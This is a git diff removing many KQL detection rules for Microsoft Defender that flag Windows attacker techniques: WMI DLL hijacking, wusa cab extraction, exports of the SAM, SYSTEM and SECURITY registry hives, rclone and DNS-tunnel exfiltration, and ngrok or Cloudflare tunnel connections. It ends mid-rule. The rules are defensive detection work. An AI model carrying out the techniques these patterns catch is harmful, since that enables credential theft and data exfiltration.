495f7484..00000000 --- a/Execution/Weak_or_Abused_Passwords_In_CLI.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/14 -// Level: medium -// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. -An example would be a threat actor creating a new user via the net command and providing the password inline - -// Tags: attack.defense_evasion, attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202" \ No newline at end of file diff --git a/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql b/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql deleted file mode 100644 index 22255567..00000000 --- a/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/11 -// Level: medium -// Description: Detects the creation of binaries in the WinSxS folder by non-system processes -// Tags: attack.execution -DeviceFileEvents -| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index cc9098f3..00000000 --- a/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/20 -// Level: medium -// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where ProcessCommandLine contains " qfe" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/Execution/WmiPrvSE_Spawned_A_Process.kql b/Execution/WmiPrvSE_Spawned_A_Process.kql deleted file mode 100644 index 548475bc..00000000 --- a/Execution/WmiPrvSE_Spawned_A_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez @Cyb3rWard0g -// Date: 2019/08/15 -// Level: medium -// Description: Detects WmiPrvSE spawning a process -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\WmiPrvSe.exe" and (not(((LogonId in~ ("0x3e7", "null")) or isnull(LogonId) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe"))) \ No newline at end of file diff --git a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql b/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql deleted file mode 100644 index 631d57e9..00000000 --- a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/12 -// Level: high -// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. -// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe" \ No newline at end of file diff --git a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql b/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql deleted file mode 100644 index 60ed5e82..00000000 --- a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/12 -// Level: critical -// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. -// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002 -DeviceFileEvents -| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll" \ No newline at end of file diff --git a/Execution/Wscript_Shell_Run_In_CommandLine.kql b/Execution/Wscript_Shell_Run_In_CommandLine.kql deleted file mode 100644 index c0512515..00000000 --- a/Execution/Wscript_Shell_Run_In_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/31 -// Level: medium -// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains "Wscript." and ProcessCommandLine contains ".Shell" and ProcessCommandLine contains ".Run" \ No newline at end of file diff --git a/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql b/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql deleted file mode 100644 index e16627c1..00000000 --- a/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/11/26 -// Level: high -// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. - -// Tags: attack.execution -DeviceProcessEvents -| where FolderPath endswith "\\wusa.exe" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\Appdata\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\"))) \ No newline at end of file diff --git a/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql b/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql deleted file mode 100644 index c319c717..00000000 --- a/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/05 -// Level: high -// Description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument from suspicious paths -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Appdata\\Local\\Temp\\") and (ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe") \ No newline at end of file diff --git a/Execution/Wusa_Extracting_Cab_Files.kql b/Execution/Wusa_Extracting_Cab_Files.kql deleted file mode 100644 index 13b35564..00000000 --- a/Execution/Wusa_Extracting_Cab_Files.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/04 -// Level: medium -// Description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique -// Tags: attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe" \ No newline at end of file diff --git a/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql b/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql deleted file mode 100644 index bd2befa9..00000000 --- a/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/01 -// Level: medium -// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL - -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files"))) \ No newline at end of file diff --git a/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql b/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql deleted file mode 100644 index f4819e7d..00000000 --- a/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/14 -// Level: medium -// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. -// Tags: attack.exfiltration, attack.discovery, attack.t1087.002 -DeviceProcessEvents -| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i")) \ No newline at end of file diff --git a/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql b/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql deleted file mode 100644 index bb23104b..00000000 --- a/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/14 -// Level: medium -// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. -// Tags: attack.exfiltration -DeviceProcessEvents -| where (ProcessCommandLine contains "-f" and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")) and (not(ProcessCommandLine contains " -i")) \ No newline at end of file diff --git a/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql b/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql deleted file mode 100644 index 35c6c056..00000000 --- a/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2021/11/26 -// Level: medium -// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. -Users can configure different pilot collections for each of the co-management workloads. -It can be abused by attackers in order to upload or download files. - -// Tags: attack.exfiltration, attack.t1567 -DeviceProcessEvents -| where (ProcessCommandLine contains "ConfigSecurityPolicy.exe" or FolderPath endswith "\\ConfigSecurityPolicy.exe" or ProcessVersionInfoOriginalFileName =~ "ConfigSecurityPolicy.exe") and (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") \ No newline at end of file diff --git a/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql b/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql deleted file mode 100644 index 7585af33..00000000 --- a/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/11/03 -// Level: high -// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. -Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. -While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. - -// Tags: attack.exfiltration, attack.command_and_control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508 -DeviceNetworkEvents -| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com" \ No newline at end of file diff --git a/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql b/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql deleted file mode 100644 index c32def88..00000000 --- a/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3 -// Date: 2023/12/19 -// Level: low -// Description: Detects execution of "tar.exe" in order to create a compressed file. -Adversaries may abuse various utilities to compress or encrypt data before exfiltration. - -// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file diff --git a/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql b/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql deleted file mode 100644 index f02eb771..00000000 --- a/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: AdmU3 -// Date: 2023/12/19 -// Level: low -// Description: Detects execution of "tar.exe" in order to extract compressed file. -Adversaries may abuse various utilities in order to decompress data to avoid detection. - -// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 -DeviceProcessEvents -| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file diff --git a/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql deleted file mode 100644 index 2846d8ff..00000000 --- a/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali -// Date: 2019/12/30 -// Level: medium -// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote -// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002 -DeviceProcessEvents -| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))))) \ No newline at end of file diff --git a/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql b/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql deleted file mode 100644 index 03a3a05c..00000000 --- a/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2019/10/24 -// Level: high -// Description: Well-known DNS Exfiltration tools execution -// Tags: attack.exfiltration, attack.t1048.001, attack.command_and_control, attack.t1071.004, attack.t1132.001 -DeviceProcessEvents -| where FolderPath endswith "\\iodine.exe" or FolderPath contains "\\dnscat2" \ No newline at end of file diff --git a/Exfiltration/Email_Exifiltration_Via_Powershell.kql b/Exfiltration/Email_Exifiltration_Via_Powershell.kql deleted file mode 100644 index 1dbebea8..00000000 --- a/Exfiltration/Email_Exifiltration_Via_Powershell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea) -// Date: 2022/09/09 -// Level: high -// Description: Detects email exfiltration via powershell cmdlets -// Tags: attack.exfiltration -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-PSSnapin" and ProcessCommandLine contains "Get-Recipient" and ProcessCommandLine contains "-ExpandProperty" and ProcessCommandLine contains "EmailAddresses" and ProcessCommandLine contains "SmtpAddress" and ProcessCommandLine contains "-hidetableheaders") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql b/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql deleted file mode 100644 index 4eea2e37..00000000 --- a/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Oddvar Moe, Sander Wiebing, oscd.community -// Date: 2020/10/12 -// Level: high -// Description: Detects the export of a crital Registry key to a file. -// Tags: attack.exfiltration, attack.t1012 -DeviceProcessEvents -| where (ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E ") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE") \ No newline at end of file diff --git a/Exfiltration/Exports_Registry_Key_To_a_File.kql b/Exfiltration/Exports_Registry_Key_To_a_File.kql deleted file mode 100644 index 77d9247a..00000000 --- a/Exfiltration/Exports_Registry_Key_To_a_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Oddvar Moe, Sander Wiebing, oscd.community -// Date: 2020/10/07 -// Level: low -// Description: Detects the export of the target Registry key to a file. -// Tags: attack.exfiltration, attack.t1012 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E ") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security")))) \ No newline at end of file diff --git a/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql b/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql deleted file mode 100644 index ccb7d091..00000000 --- a/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger -// Date: 2021/09/30 -// Level: medium -// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe -// Tags: attack.exfiltration, attack.t1567 -DeviceProcessEvents -| where (ProcessCommandLine contains "/in:" or ProcessCommandLine contains "/out:" or ProcessCommandLine contains "/uri:") and (FolderPath endswith "\\DataSvcUtil.exe" or ProcessVersionInfoOriginalFileName =~ "DataSvcUtil.exe") \ No newline at end of file diff --git a/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql b/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql deleted file mode 100644 index a9c40d3a..00000000 --- a/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2024/05/31 -// Level: medium -// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors -// Tags: attack.t1041, attack.command_and_control, attack.t1090.002, attack.exfiltration -DeviceNetworkEvents -| where RemoteUrl endswith ".portmap.io" \ No newline at end of file diff --git a/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql b/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql deleted file mode 100644 index 1f2dad0d..00000000 --- a/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/05/27 -// Level: medium -// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system. -Attackers can abuse that feature to establish a reverse shell or persistence on a machine. - -// Tags: attack.exfiltration, attack.command_and_control, attack.t1567.001 -DeviceNetworkEvents -| where RemoteUrl endswith ".v2.argotunnel.com" or RemoteUrl endswith "protocol-v2.argotunnel.com" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "update.argotunnel.com" \ No newline at end of file diff --git a/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql b/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql deleted file mode 100644 index 8e3e38f9..00000000 --- a/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Kamran Saifullah -// Date: 2023/11/20 -// Level: medium -// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. - -// Tags: attack.exfiltration, attack.t1567.001 -DeviceNetworkEvents -| where RemoteUrl endswith ".devtunnels.ms" \ No newline at end of file diff --git a/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql b/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql deleted file mode 100644 index 8b99a5d5..00000000 --- a/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/12/06 -// Level: low -// Description: Detects a network connection initiated by a binary to "api.mega.co.nz". -Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads. - -// Tags: attack.exfiltration, attack.t1567.001 -DeviceNetworkEvents -| where RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" \ No newline at end of file diff --git a/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql b/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql deleted file mode 100644 index a6d547c3..00000000 --- a/Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Kamran Saifullah -// Date: 2023/11/20 -// Level: medium -// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. - -// Tags: attack.exfiltration, attack.t1567.001 -DeviceNetworkEvents -| where RemoteUrl endswith ".tunnels.api.visualstudio.com" \ No newline at end of file diff --git a/Exfiltration/PUA_-_Rclone_Execution.kql b/Exfiltration/PUA_-_Rclone_Execution.kql deleted file mode 100644 index 187803ec..00000000 --- a/Exfiltration/PUA_-_Rclone_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group -// Date: 2021/05/10 -// Level: high -// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc -// Tags: attack.exfiltration, attack.t1567.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "--config " and ProcessCommandLine contains "--no-check-certificate " and ProcessCommandLine contains " copy ") or ((ProcessCommandLine contains "pass" or ProcessCommandLine contains "user" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "sync" or ProcessCommandLine contains "config" or ProcessCommandLine contains "lsd" or ProcessCommandLine contains "remote" or ProcessCommandLine contains "ls" or ProcessCommandLine contains "mega" or ProcessCommandLine contains "pcloud" or ProcessCommandLine contains "ftp" or ProcessCommandLine contains "ignore-existing" or ProcessCommandLine contains "auto-confirm" or ProcessCommandLine contains "transfers" or ProcessCommandLine contains "multi-thread-streams" or ProcessCommandLine contains "no-check-certificate ") and (FolderPath endswith "\\rclone.exe" or ProcessVersionInfoFileDescription =~ "Rsync for cloud storage")) \ No newline at end of file diff --git a/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql b/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql deleted file mode 100644 index 68832173..00000000 --- a/Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/16 -// Level: high -// Description: Detects an executable initiating a network connection to "ngrok" domains. -Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. -While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. - -// Tags: attack.exfiltration, attack.t1567.001 -DeviceNetworkEvents -| where RemoteUrl endswith ".ngrok-free.app" or RemoteUrl endswith ".ngrok-free.dev" or RemoteUrl endswith ".ngrok.app" or RemoteUrl endswith ".ngrok.dev" or RemoteUrl endswith ".ngrok.io" \ No newline at end of file diff --git a/Exfiltration/Rclone_Config_File_Creation.kql b/Exfiltration/Rclone_Config_File_Creation.kql deleted file mode 100644 index 670716d1..00000000 --- a/Exfiltration/Rclone_Config_File_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Aaron Greetham (@beardofbinary) - NCC Group -// Date: 2021/05/26 -// Level: medium -// Description: Detects Rclone config files being created -// Tags: attack.exfiltration, attack.t1567.002 -DeviceFileEvents -| where FolderPath contains ":\\Users\\" and FolderPath contains "\\.config\\rclone\\" \ No newline at end of file diff --git a/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql b/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql deleted file mode 100644 index b9fb4ee4..00000000 --- a/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/08/07 -// Level: critical -// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations -// Tags: attack.exfiltration -DeviceProcessEvents -| where ProcessCommandLine contains "New-MailboxExportRequest" and ProcessCommandLine contains " -Mailbox " and ProcessCommandLine contains " -FilePath \\\\" \ No newline at end of file diff --git a/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql b/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql deleted file mode 100644 index 6be1dff3..00000000 --- a/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/16 -// Level: high -// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers -// Tags: attack.exfiltration, attack.t1048 -DeviceProcessEvents -| where ProcessCommandLine contains ">" and (ProcessCommandLine contains "\\\\127.0.0.1\\admin$\\" or ProcessCommandLine contains "\\\\localhost\\admin$\\") \ No newline at end of file diff --git a/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql b/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql deleted file mode 100644 index 4e2e05ff..00000000 --- a/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2023/03/16 -// Level: high -// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 - -// Tags: attack.exfiltration, attack.t1048.003, cve.2023.23397 -DeviceProcessEvents -| where (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "-s WebClient" and InitiatingProcessFolderPath endswith "\\svchost.exe") and (not((ProcessCommandLine contains "://10." or ProcessCommandLine contains "://192.168." or ProcessCommandLine contains "://172.16." or ProcessCommandLine contains "://172.17." or ProcessCommandLine contains "://172.18." or ProcessCommandLine contains "://172.19." or ProcessCommandLine contains "://172.20." or ProcessCommandLine contains "://172.21." or ProcessCommandLine contains "://172.22." or ProcessCommandLine contains "://172.23." or ProcessCommandLine contains "://172.24." or ProcessCommandLine contains "://172.25." or ProcessCommandLine contains "://172.26." or ProcessCommandLine contains "://172.27." or ProcessCommandLine contains "://172.28." or ProcessCommandLine contains "://172.29." or ProcessCommandLine contains "://172.30." or ProcessCommandLine contains "://172.31." or ProcessCommandLine contains "://127." or ProcessCommandLine contains 